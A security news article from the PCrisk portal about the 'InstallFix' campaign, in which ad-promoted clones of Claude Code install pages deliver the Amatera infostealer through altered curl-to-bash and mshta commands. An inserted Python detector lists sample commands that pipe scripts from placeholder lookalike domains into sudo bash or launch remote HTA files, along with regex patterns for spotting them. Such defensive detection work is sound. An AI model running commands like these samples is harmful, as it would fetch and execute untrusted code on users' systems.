Fake Claude Code Installation Guides Deliver Amatera
Cybercriminals are increasingly exploiting the popularity of AI development tools to distribute malware through sophisticated social engineering campaigns. Security researchers recently uncovered a new attack technique, InstallFix, that leverages fake installation guides for popular command-line tools to trick victims into running malicious commands.

The campaign specifically targets users searching for installation instructions for Claude Code, an AI-powered command-line coding assistant developed by Anthropic. Instead of installing the legitimate tool, victims inadvertently deploy infostealer malware on their systems.
The attack demonstrates how cybercriminals refine techniques to exploit developer workflows. By closely mimicking legitimate documentation and leveraging search engine ads, attackers increase the odds that users will execute malicious code, often without suspicion. InstallFix sits at the intersection of social engineering, developer tools, and malware-as-a-service ecosystems.
The InstallFix technique represents an evolution of the ClickFix social engineering strategy, which typically manipulates victims into running commands under the guise of fixing technical issues. In the InstallFix variant, attackers eliminate the need for a troubleshooting scenario. Instead, the attack targets users who are actively attempting to install software.
Security researchers discovered that attackers create nearly identical clones of legitimate software installation pages. These replicas reproduce the visual design, navigation elements, and documentation structure of the official site. The only significant difference lies in the installation commands themselves, which have been altered to download malware from attacker-controlled infrastructure rather than legitimate sources.
The approach leverages a practice among developers known as "curl-to-bash" installation. In this method, users enter a command in their terminal using the "curl" tool to download data from the internet, and the data is immediately passed to the "bash" shell for execution. This simple installation process is widely used in developer tools and package managers. However, it assumes the downloaded code comes from a trusted source, creating a risk if attackers change the destination.
Attackers exploit this behavior by replacing legitimate scripts with malicious ones. If a user copies and executes the modified command, the attacker can run arbitrary code on the victim's system.
As documented by Push Security, distribution is a critical component of the InstallFix campaign. Rather than relying on phishing emails or compromised websites, attackers promote their fake installation pages through malicious search engine advertisements. When users search for terms such as "Claude Code install" or "Claude Code CLI," the malicious pages appear as sponsored results at the top of search listings.
This approach significantly increases the likelihood of successful compromise because users often trust results that appear prominently in search engines. Many individuals assume sponsored results are vetted or associated with official vendors. In reality, the advertisements direct victims to lookalike domains hosting cloned documentation pages.
Researchers observed cloned sites mirroring legitimate instructions, branding, and navigation. Most links redirect to the real Claude Code site, further reinforcing authenticity. Victims may remain unaware of compromise after following malicious instructions.
The Amatera Stealer Payload
The primary malware delivered in the InstallFix campaign is Amatera Stealer, an emerging infostealer family believed to be derived from the earlier ACR Stealer malware. The malware is often distributed through a malware-as-a-service (MaaS) model, allowing cybercriminals to subscribe to the platform and deploy it in their own campaigns.
Once installed, Amatera targets browser-stored credentials, cookies, session tokens, cryptocurrency wallet data, system information, and authentication tokens that can enable account takeover.
The malware communicates with command-and-control infrastructure using techniques designed to evade detection. In some cases, it leverages legitimate content delivery networks or trusted cloud platforms to host malicious components. Researchers observed that campaign infrastructure is hosted on services such as Cloudflare Pages, Squarespace, and Tencent EdgeOne, making it more difficult to block malicious activity.
For users on Apple's macOS operating system, the malicious command usually contains code encoded in base64. When this code runs, it downloads and runs the infostealer program. On Windows, hackers use a legitimate Windows program, mshta.exe—a tool designed to run web-based applications—to fetch and launch the malware from an attacker's server.
These variations enable attackers to target multiple operating systems while maintaining a consistent social engineering lure.
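As an added defensive illustration (not part of the original article or of Push Security's research), the following Python detector tags recorded shell command lines that match the curl-to-bash, base64-to-shell and mshta patterns described above. The allowlist of trusted install hosts, the sample command lines and the `.example` domains are constructed assumptions, not indicators from the campaign.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts that legitimately serve the vendor's install script;
# in practice an organisation builds this from the official documentation.
TRUSTED_INSTALL_HOSTS = {"claude.ai", "anthropic.com"}

PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|zsh|sh)\b")
URL_RE = re.compile(r"https?://[^\s'\"|<>]+")
B64_DECODE = re.compile(r"\bbase64\b.*(?:-d|-D|--decode)\b")
MSHTA = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)

# Constructed sample command lines, as an EDR or shell-history collector might
# record them. The .example domains are placeholders, not real infrastructure.
SAMPLE_COMMANDS = [
    "curl -fsSL https://claude.ai/install.sh | bash",
    "curl -fsSL https://claude-code-install.example/install.sh | sudo bash",
    "echo ZWNobyBoZWxsbw== | base64 -d | sh",   # base64 of "echo hello"
    "mshta http://claude-code-download.example/app.hta",
    "git status",
]


def _is_trusted(host: str) -> bool:
    host = host.lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_INSTALL_HOSTS)


def untrusted_hosts(cmd: str) -> list[str]:
    """Hosts referenced by URLs in the command that are not on the allowlist."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(cmd)}
    return sorted(h for h in hosts if h and not _is_trusted(h))


def assess_command(cmd: str) -> list[str]:
    """Return detection tags for one recorded command line (empty if benign)."""
    tags = []
    piped = bool(PIPE_TO_SHELL.search(cmd))
    has_url = bool(URL_RE.search(cmd))
    if piped and has_url:  # curl-to-bash style install
        tags.append("pipe-to-shell:untrusted-host" if untrusted_hosts(cmd)
                    else "pipe-to-shell:trusted-host")
    if piped and B64_DECODE.search(cmd):  # macOS-style encoded loader
        tags.append("base64-decoded-pipe-to-shell")
    if has_url and MSHTA.search(cmd):  # Windows-style remote HTA launch
        tags.append("mshta-remote-fetch")
    return tags


def scan_commands(commands: list[str]) -> list[tuple[str, list[str]]]:
    """Pair every command that produced at least one tag with its tags."""
    return [(c, assess_command(c)) for c in commands if assess_command(c)]
```

Even the trusted-host hit is worth reviewing: the point of the allowlist is to make a lookalike domain stand out, not to bless every pipe-to-shell install.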
Developers are prime InstallFix targets because they routinely use command-line tools and automated scripts, making them especially vulnerable to deceptive installation processes.
Developers often trust and copy commands without inspecting the scripts they fetch, lowering the barrier to compromise if attackers replace legitimate instructions with malicious ones and granting the attacker the privileges of the account that ran the command.
Several factors amplify the risk:
- The rapid adoption of AI-powered development tools is attracting a wider audience, including less experienced users.
- Installation instructions often encourage quick copy-and-paste commands for convenience.
- The visual similarity between legitimate and malicious documentation pages makes detection difficult.
Researchers warn that these dynamics create an expanding attack surface. As AI coding tools and developer platforms gain mainstream popularity, attackers can increasingly target non-technical users who lack the experience to identify suspicious installation instructions.
The InstallFix campaign reflects a broader trend in which attackers increasingly target developer ecosystems and AI tooling environments. As the software development landscape evolves, cybercriminals recognize that developer workflows provide efficient pathways to compromise high-value targets.
By exploiting trusted installation practices and manipulating search engine results, threat actors can infiltrate systems without exploiting traditional vulnerabilities. Instead, they rely on users themselves to execute malicious code.
Security researchers warn that the technique will likely expand as new developer tools gain popularity. Every widely adopted platform represents an opportunity for attackers to replicate the InstallFix model and distribute malware to a growing user base.
For organizations, InstallFix underscores the need to monitor browser threats, enforce secure development practices, and educate users to avoid blindly executing commands. Defending against such threats requires vigilance at the intersection of user behavior, developer tools, and endpoint security.
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.